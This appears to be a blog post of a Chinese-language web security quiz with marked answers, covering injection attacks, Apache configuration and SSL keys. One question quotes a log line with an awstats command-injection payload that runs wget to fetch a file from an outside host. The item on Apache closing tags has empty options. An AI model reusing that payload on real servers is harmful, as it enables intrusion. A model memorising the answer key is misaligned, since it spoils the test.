| 題庫總數:20 | ||
| 是非題:2 (○:0、╳:2) | ||
| 選擇題:16 (A:5、B:2、C:6、D:3) | ||
| 多選題:2 | ||
| 有題目的答案是沒有內容的,應該是學習平台裡的資料有錯,如果後來有修正麻煩留言告訴我,謝謝 roddayeye整理 | ||
| Q | 安裝了最新系統修補程式,我的網頁應用程式(知名網頁討論版PHPBB)也都是最新版的,應不致有安全上的疑慮了。 | |
| ○ | ||
| v | ╳ | |
| Q | IDS/IPS可偵測本課程所述之所有攻擊行為。 | |
| ○ | ||
| v | ╳ | |
| Q | 下列何者並非網站應用系統技術之一? | |
| 1. PHP | ||
| 2. VB.Net | ||
| v | 3. Assembly | |
| 4. Java | ||
| Q | 下列敘述何者錯誤? | |
| 1.網站應用系統一般使用Port 80來傳輸 | ||
| 2. IIS是網站伺服器軟體 | ||
| v | 3. Apache只能在Unix上安裝 | |
| 4. PHP可以製作動態網頁 | ||
| Q | 請檢視自下列網站伺服器紀錄,指出何為可疑的http要求? | |
| 1. 10.2.3.4 - - [26/Jan/2006:09:43:40 -0700] | ||
| v | 2. 68.124.193.166 - - [09/Nov/2005:07:56:40 +0800] GET cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2011%2e22%2e33%2e44%2flisten%3b | |
| 3. 12.3.3.4 - - [26/Jan/2006:09:43:37 -0700] | ||
| 4. 192.168.114.201 | ||
| Q | 下列敘述何者錯誤? | |
| v | 1.存放網頁應用程式的系統安裝最新系統修補程式後,便不會存有弱點。 | |
| 2.跨站指令碼不但影響伺服主機,甚至會導致瀏覽者受害。 | ||
| 3. SQL injection是一種攻擊網站資料庫的手法。 | ||
| 4.跨目錄存取是因為程式撰寫不良。 | ||
| Q | 下列何者攻擊無法藉由過濾輸入參數來防禦? | |
| v | 1. Directory listing | |
| 2. SQL injection | ||
| 3. Cross site scripting | ||
| 4. Command injection | ||
| Q | 請指出下列何者不是本程式碼之問題所在? | |
| 1. 未過濾變數page | ||
| 2. 使用include | ||
| v | 3. if沒有接else | |
| 4. 這會造成跨目錄存取問題 | ||
| Q | Cross-site scripting 攻擊無法達到下列何種行為? | |
| 1.強迫瀏覽者轉址 | ||
| v | 2.取得網站伺服器控制權 | |
| 3.偷取瀏覽者cookie | ||
| 4.騙取瀏覽者輸入資料 | ||
| Q | 下列何者為非? | |
| 1.指令插入弱點甚至會被撰寫成worm進行散播,awstats便是一例。 | ||
| 2. Cross-site scripting 也有可能遭利用,撰寫為worm。 | ||
| v | 3. SQL injection 最有名的worm就是SQL Slammer | |
| 4. Cookie值應該要編碼 | ||
| Q | Apache設定檔可以透過下列那個語法,將其它分散的設定檔納入? | |
| 1. Source | ||
| 2. Link | ||
| 3. Insert | ||
| v | 4. Include | |
| Q | 在Apache設定語法中,若一個Directive的開始標籤式是,請問其結束標籤如何表示? | |
| v | 1. | |
| 2. <#ABC> | ||
| 3. | ||
| 4. | ||
| Q | 請問WWW預設的Port是幾號? | |
| 1. TCP/8000 | ||
| 2. TCP/8080 | ||
| 3. TCP/800 | ||
| v | 4. TCP/80 | |
| Q | 在SSL加密流程中,以下那種KEY在網路上被加密傳遞? | |
| v | 1. secret key | |
| 2. public key | ||
| 3. private key | ||
| 4. server key | ||
| Q | 以下關於CA角色的敘述,何者是正確的? | |
| 1. 產生KEY的機構 | ||
| 2. 儲存KEY的機構 | ||
| 3. 散佈KEY的機構 | ||
| v | 4. 背書證明內容與key的機構 | |
| Q | 請問驗證證書真偽的方法是甚麼? | |
| v | 1. 需要CA的公鑰驗 | |
| 2. 需要CA的公私鑰 | ||
| 3. 自動信任 | ||
| 4. 無法驗證 | ||
| Q | 請問Apache所用的Server Key存放目錄是以下那一個? | |
| 1. /etc/apache2 | ||
| 2. /etc/apache2/ssl.crt | ||
| v | 3. /etc/apache2/ssl.key | |
| 4. /etc/apache2/ssl.csr | ||
| Q | 在SSL加密流程中,以下那種KEY用來解密別的被加密傳遞的KEY? | |
| 1. secret key | ||
| 2. public key | ||
| v | 3. private key | |
| 4. server key | ||
| Q | 在預設的Apache配置下,以下那些目錄會存放在Server Root之下? | |
| 1. htdocs | ||
| v | 2. conf | |
| v | 3. logs | |
| v | 4. modules | |
| Q | 在預設的Apache配置下,以下那些目錄會存放在Document Root之下? | |
| v | 1. htdocs | |
| v | 2. cgi-bin | |
| v | 3. icons | |
| 4. modules | ||
文章標籤
全站熱搜
留言列表